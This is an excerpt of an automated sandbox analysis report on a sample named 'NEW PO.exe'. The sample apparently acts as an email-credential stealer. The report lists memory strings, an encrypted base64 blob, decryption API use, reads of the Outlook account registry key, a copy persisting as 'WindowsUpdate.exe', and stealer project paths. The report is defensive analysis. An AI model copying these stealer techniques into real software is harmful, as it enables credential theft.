Source: NEW PO.exe, 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp, NEW PO.exe, 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp, vbc.exe, WindowsUpdate.exe, 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp, WindowsUpdate.exe, 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.401286482.00000000042D1000.00000004.00000001.sdmp, vbc.exe, 00000016.00000000.399740135.0000000000400000.00000040.00000001.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: NEW PO.exe, 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp, NEW PO.exe, 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp, vbc.exe, WindowsUpdate.exe, 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp, WindowsUpdate.exe, 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.401286482.00000000042D1000.00000004.00000001.sdmp, vbc.exe, 00000016.00000000.399740135.0000000000400000.00000040.00000001.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: NEW PO.exe, 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp, NEW PO.exe, 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp, vbc.exe, WindowsUpdate.exe, 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp, WindowsUpdate.exe, 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.401286482.00000000042D1000.00000004.00000001.sdmp, vbc.exe, 00000016.00000000.399740135.0000000000400000.00000040.00000001.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: C:\Users\user\Desktop\NEW PO.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 10_2_00411196 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,

10_2_00411196

Source: 7.0.NEW PO.exe.400000.11.unpack, Form1.cs	Base64 encoded string: 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
Source: 7.0.NEW PO.exe.400000.6.unpack, Form1.cs	Base64 encoded string: 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
Source: 7.0.NEW PO.exe.400000.38.unpack, Form1.cs	Base64 encoded string: 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
Source: 7.0.NEW PO.exe.400000.21.unpack, Form1.cs	Base64 encoded string: 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
Source: 7.0.NEW PO.exe.400000.16.unpack, Form1.cs	Base64 encoded string: 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
Source: 7.0.NEW PO.exe.400000.26.unpack, Form1.cs	Base64 encoded string: 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
Source: 7.0.NEW PO.exe.400000.4.unpack, Form1.cs	Base64 encoded string: 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
Source: 7.2.NEW PO.exe.400000.0.unpack, Form1.cs	Base64 encoded string: 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
Source: 16.0.WindowsUpdate.exe.400000.6.unpack, Form1.cs	Base64 encoded string: 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
Source: 16.0.WindowsUpdate.exe.400000.21.unpack, Form1.cs	Base64 encoded string: 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
Source: 16.2.WindowsUpdate.exe.400000.0.unpack, Form1.cs	Base64 encoded string: 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
Source: 16.0.WindowsUpdate.exe.400000.4.unpack, Form1.cs	Base64 encoded string: 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
Source: 16.0.WindowsUpdate.exe.400000.11.unpack, Form1.cs	Base64 encoded string: 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
Source: 16.0.WindowsUpdate.exe.400000.16.unpack, Form1.cs	Base64 encoded string: 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6044
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3996

Source: 7.0.NEW PO.exe.400000.11.unpack, Form1.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 7.0.NEW PO.exe.400000.11.unpack, Form1.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 7.0.NEW PO.exe.400000.11.unpack, Form1.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 7.0.NEW PO.exe.400000.11.unpack, Form1.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.0.NEW PO.exe.400000.6.unpack, Form1.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 7.0.NEW PO.exe.400000.6.unpack, Form1.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 7.0.NEW PO.exe.400000.6.unpack, Form1.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 7.0.NEW PO.exe.400000.6.unpack, Form1.cs	Cryptographic APIs: 'CreateDecryptor'

Source: C:\Users\user\Desktop\NEW PO.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\NEW PO.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Jump to behavior

Source: NEW PO.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: NEW PO.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: rsaenh.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: anagement.pdb source: WerFault.exe, 0000000D.00000003.340137241.00000000054D1000.00000004.00000001.sdmp
Source:	Binary string: System.ni.pdb% source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: System.ni.pdb" source: WerFault.exe, 0000000D.00000003.340006084.00000000054F2000.00000004.00000001.sdmp
Source:	Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000000D.00000003.340221488.00000000054A0000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: onfiguration.ni.pdb source: WerFault.exe, 0000000D.00000003.340006084.00000000054F2000.00000004.00000001.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000000D.00000003.340137241.00000000054D1000.00000004.00000001.sdmp
Source:	Binary string: wbemcomn.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: mskeyprotect.pdb source: WerFault.exe, 0000000D.00000003.340137241.00000000054D1000.00000004.00000001.sdmp
Source:	Binary string: NapiNSP.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000000D.00000003.340137241.00000000054D1000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000D.00000003.340137241.00000000054D1000.00000004.00000001.sdmp
Source:	Binary string: jPC:\Windows\System.Runtime.Remoting.pdb source: NEW PO.exe, 00000007.00000002.366985049.0000000007E1B000.00000004.00000010.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 0000000D.00000003.340221488.00000000054A0000.00000004.00000040.sdmp
Source:	Binary string: ml.pdbZ source: WerFault.exe, 0000000D.00000003.340006084.00000000054F2000.00000004.00000001.sdmp
Source:	Binary string: ntmarta.pdb7 source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: ml.pdb source: WerFault.exe, 0000000D.00000003.340006084.00000000054F2000.00000004.00000001.sdmp
Source:	Binary string: winnsi.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: symbols\dll\System.Runtime.Remoting.pdbd source: NEW PO.exe, 00000007.00000002.366985049.0000000007E1B000.00000004.00000010.sdmp
Source:	Binary string: clr.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: .ni.pdb source: WerFault.exe, 0000000D.00000003.340137241.00000000054D1000.00000004.00000001.sdmp
Source:	Binary string: cryptsp.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000000D.00000003.340221488.00000000054A0000.00000004.00000040.sdmp
Source:	Binary string: ility.pdb source: WerFault.exe, 0000000D.00000003.340006084.00000000054F2000.00000004.00000001.sdmp
Source:	Binary string: msctf.pdb} source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000000D.00000003.340137241.00000000054D1000.00000004.00000001.sdmp
Source:	Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: ntmarta.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: schannel.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000000D.00000003.340221488.00000000054A0000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 0000000D.00000003.340137241.00000000054D1000.00000004.00000001.sdmp
Source:	Binary string: dwmapi.pdb_ source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdbY source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: NEW PO.exe, 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp, NEW PO.exe, 00000007.00000000.320473195.0000000007EE0000.00000004.00020000.sdmp, WindowsUpdate.exe, 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp, WindowsUpdate.exe, 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.398190268.00000000032D1000.00000004.00000001.sdmp
Source:	Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: NEW PO.exe, 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp, NEW PO.exe, 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp, vbc.exe, WindowsUpdate.exe, 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp, WindowsUpdate.exe, 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.401286482.00000000042D1000.00000004.00000001.sdmp, vbc.exe, 00000017.00000000.402469174.0000000000400000.00000040.00000001.sdmp
Source:	Binary string: System.Xml.pdbx source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb+ source: NEW PO.exe, 00000007.00000002.367171586.000000000821A000.00000004.00000010.sdmp, WindowsUpdate.exe, 00000012.00000002.439840965.0000000008BEA000.00000004.00000010.sdmp
Source:	Binary string: WindowsUpdate.PDB- source: WindowsUpdate.exe, 00000012.00000002.439840965.0000000008BEA000.00000004.00000010.sdmp
Source:	Binary string: mscoree.pdb source: WerFault.exe, 0000000D.00000003.340221488.00000000054A0000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: System.pdb` source: WerFault.exe, 0000000D.00000003.340006084.00000000054F2000.00000004.00000001.sdmp
Source:	Binary string: System.Runtime.Remoting.pdbx source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: symbols\dll\mscorlib.pdb source: NEW PO.exe, 00000007.00000002.367171586.000000000821A000.00000004.00000010.sdmp, WindowsUpdate.exe, 00000012.00000002.439840965.0000000008BEA000.00000004.00000010.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb. source: NEW PO.exe, 00000007.00000002.366368381.00000000072C0000.00000004.00000001.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: nsi.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: profapi.pdbu source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: dnsapi.pdbq source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: System.Configuration.pdb source: WerFault.exe, 0000000D.00000003.339925797.00000000054F1000.00000004.00000001.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdbM source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdbo source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbG source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: msasn1.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: mscorlib.pdb source: NEW PO.exe, 00000007.00000002.367171586.000000000821A000.00000004.00000010.sdmp, WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000002.439840965.0000000008BEA000.00000004.00000010.sdmp
Source:	Binary string: comctl32v582.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: CMemoryExecute.pdb`*" source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: DWrite.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: System.Drawing.pdb source: WerFault.exe, 0000000D.00000003.339925797.00000000054F1000.00000004.00000001.sdmp
Source:	Binary string: System.Management.pdb source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000000D.00000003.340137241.00000000054D1000.00000004.00000001.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: NEW PO.exe, 00000007.00000002.366422934.00000000072F0000.00000004.00000001.sdmp
Source:	Binary string: gdiplus.pdbk source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: Accessibility.pdbx source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: ncrypt.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: secur32.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: comctl32.pdbI source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: rasadhlp.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: ml.ni.pdb source: WerFault.exe, 0000000D.00000003.340006084.00000000054F2000.00000004.00000001.sdmp
Source:	Binary string: xecute.pdb source: WerFault.exe, 0000000D.00000003.340137241.00000000054D1000.00000004.00000001.sdmp
Source:	Binary string: winhttp.pdb[ source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: Accessibility.pdb source: WerFault.exe, 0000000D.00000003.339925797.00000000054F1000.00000004.00000001.sdmp
Source:	Binary string: rawing.pdb source: WerFault.exe, 0000000D.00000003.340006084.00000000054F2000.00000004.00000001.sdmp
Source:	Binary string: System.Management.pdbx source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb! source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: pnrpnsp.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: winnsi.pdbO source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: version.pdb{ source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdbx source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb~o{ source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000000D.00000003.340137241.00000000054D1000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: CMemoryExecute.pdb source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000D.00000003.339925797.00000000054F1000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: mskeyprotect.pdb_ source: WerFault.exe, 0000000D.00000003.340137241.00000000054D1000.00000004.00000001.sdmp
Source:	Binary string: iphlpapi.pdbU source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: dhcpcsvc6.pdbC source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.pdb source: NEW PO.exe, 00000007.00000002.366368381.00000000072C0000.00000004.00000001.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: dnsapi.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: rasapi32.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: DWrite.pdbw source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: nlaapi.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: diasymreader.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: j0C:\Windows\mscorlib.pdb source: NEW PO.exe, 00000007.00000002.367171586.000000000821A000.00000004.00000010.sdmp, WindowsUpdate.exe, 00000012.00000002.439840965.0000000008BEA000.00000004.00000010.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbm source: NEW PO.exe, 00000007.00000000.312477071.0000000000ED0000.00000004.00000001.sdmp
Source:	Binary string: m'Xn.pdb source: NEW PO.exe, 00000007.00000002.366985049.0000000007E1B000.00000004.00000010.sdmp
Source:	Binary string: wmswsock.pdbS source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: winhttp.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: ntasn1.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: wmiutils.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: gdiplus.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: System.ni.pdbT3 source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: System.pdbx source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: rtutils.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: System.Runtime.Remoting.pdb0 source: NEW PO.exe, 00000007.00000002.366473803.0000000007337000.00000004.00000001.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
